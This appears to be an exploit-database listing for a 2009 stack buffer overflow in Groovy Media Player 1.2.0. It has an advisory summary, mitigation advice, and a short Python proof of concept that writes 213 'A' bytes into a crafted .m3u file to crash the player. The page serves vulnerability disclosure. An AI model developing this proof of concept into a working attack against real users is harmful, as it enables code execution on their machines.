header-logo
Suggest Exploit
vendor:
Groovy Media Player
by:
opt!x hacker
9,3
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: Groovy Media Player
Affected Version From: 1.2.0
Affected Version To: 1.2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:groovy_media_player:groovy_media_player:1.2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Groovy Media Player 1.2.0 (.m3u) local stack overlow POC

Groovy Media Player 1.2.0 is vulnerable to a local stack-based buffer overflow. The vulnerability is caused due to a boundary error within the processing of .m3u files. By creating a specially crafted .m3u file, a remote attacker could overflow a buffer and execute arbitrary code. The attacker must entice a legitimate user to open a malicious .m3u file.

Mitigation:

Upgrade to the latest version of Groovy Media Player.
Source

Exploit-DB raw data:

#!/usr/bin/python
print "Groovy Media Player 1.2.0 (.m3u) local stack overlow POC"
print " finded by : opt!x hacker <optix@9.cn> "
print "download: http://www.bestwebsharing.com/downloads/groovy-media-player-setup.exe "
junk = "\x41"*213
file=open("crash.m3u","w")
file.write(junk)
file.close()

# milw0rm.com [2009-08-06]

Navigation

Suggest Exploit

Services By CQR